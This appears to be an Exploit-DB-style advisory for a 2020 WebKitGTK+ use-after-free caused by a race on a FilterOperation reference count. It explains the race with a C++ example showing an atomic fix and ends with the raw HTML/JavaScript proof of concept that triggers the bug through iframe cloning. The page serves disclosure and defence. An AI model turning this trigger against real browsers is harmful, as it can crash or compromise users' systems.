Vendor: WebKitGTK+
By: N/A
CVSS: 8.8 (HIGH)
CWE: 416 (UAF, Use-After-Free)
Product Name: WebKitGTK+
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
Year: 2020

WebKitGTK+ FilterOperation UAF Vulnerability

The compositor thread in WebKitGTK+ can modify a FilterOperation object's reference count variable at the same time as the main thread. Because the two threads race on the same counter, the reference count can be corrupted, and a corrupted count can lead to a use-after-free (UAF) condition. The reproduction case creates an iframe, clones a style element into it, and creates a div element with a filter applied; the div is then cloned and appended to the iframe's body many times, which can trigger the UAF.
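To make the mechanism concrete, the following is an added example (not WebKit code, and not part of the original advisory) that replays the race described above step by step instead of with real threads, so the outcome is reproducible: two threads each increment a plain, non-atomic reference count, one increment is lost, and the object is destroyed while a holder still points at it. The second class shows the corrective pattern for objects that legitimately cross threads, an atomic read-modify-write of the count, which is the same idea as WebKit's ThreadSafeRefCounted; the class names, the `freed` flag standing in for `delete this`, and the "holders" bookkeeping are this example's own constructs.

```cpp
// Added example (not WebKit code): why a non-atomic reference count shared
// between the main thread and the compositor thread can free a live object.
#include <atomic>

// A plain ref count, suitable only for objects that never leave one thread.
// A "++count" compiles to three separate steps: load, add, store.
struct PlainCounted {
    unsigned refCount = 1;      // the creator holds the first reference
    bool freed = false;         // stands in for `delete this`

    unsigned load() const { return refCount; }
    void store(unsigned v) { refCount = v; }
    void deref() {              // a single-threaded deref is correct on its own
        if (--refCount == 0) freed = true;
    }
};

// Replays the interleaving two threads can produce when both take a
// reference at the same time. Returns the resulting count.
unsigned interleavedRefs(PlainCounted& obj) {
    unsigned mainRead = obj.load();        // main thread: load 1
    unsigned compositorRead = obj.load();  // compositor: load 1 (main has not stored yet)
    obj.store(mainRead + 1);               // main: store 2
    obj.store(compositorRead + 1);         // compositor: store 2 (3 was expected)
    return obj.load();                     // 2: one reference is unaccounted for
}

unsigned lostUpdateCount() {
    PlainCounted obj;
    return interleavedRefs(obj);
}

// Follows the lost update through to the UAF: three holders exist but the
// count says two, so the object is destroyed while one holder remains.
bool freedWhileStillReferenced() {
    PlainCounted obj;
    unsigned holders = 1;                  // the creator
    interleavedRefs(obj);
    holders += 2;                          // main and compositor each took a ref
    obj.deref(); --holders;                // main releases its reference
    obj.deref(); --holders;                // compositor releases its reference
    return obj.freed && holders == 1;      // freed with a live holder: dangling pointer
}

// The corrective pattern for objects that cross threads: the count is changed
// with an atomic read-modify-write that no other thread can observe half-done.
struct AtomicCounted {
    std::atomic<unsigned> refCount{1};
    void ref() { refCount.fetch_add(1, std::memory_order_relaxed); }
    // Returns true only for the caller that dropped the last reference,
    // i.e. the one that must destroy the object.
    bool deref() { return refCount.fetch_sub(1, std::memory_order_acq_rel) == 1; }
};

// Two refs then three derefs: only the final deref reports "last reference".
bool atomicCountIsExact() {
    AtomicCounted obj;
    obj.ref();
    obj.ref();
    bool first = obj.deref();
    bool second = obj.deref();
    bool last = obj.deref();
    return !first && !second && last;
}
```

The defensive takeaway is the one the fix for this class of bug follows: either keep ref-counted objects confined to the thread that owns them, or give any object that is shared with the compositor a thread-safe (atomic) reference count, since a plain counter offers no protection against the interleaving replayed above.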

Mitigation:

Upgrade to the latest version of WebKitGTK+.
Source

Exploit-DB raw data:

<!--
VULNERABILITY DETAILS
The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition.


REPRODUCTION CASE
-->

<html>
<style>
@keyframes foo {
    0% { opacity: 0; }
    100% { opacity: 1; }
}

div {
  animation-name: foo;
  animation-duration: 1s;
  animation-iteration-count: infinite;
  filter: saturate(50%);
}
</style>
<body>
<script>
    frame = document.createElement("iframe");

    setInterval(_ => {
      frame.remove();
      document.body.appendChild(frame);

      doc = frame.contentDocument;
      doc.head.appendChild(document.querySelector("style").cloneNode(true));

      elt = document.createElement("div");
      elt.textContent = "foo";
      let elements = [];

      for (let i = 0, count = Math.random() * 50; i < count; ++i) {
        elements[i] = doc.body.appendChild(elt.cloneNode(true));
        elements[i].clientWidth;
      }
    }, Math.random() * 500);
</script>
</body>
</html>

<!--
VERSION
Reproduced on WebKitGTK+ build revision 240647.
This bug doesn't seem to affect WebKit on macOS/iOS.
-->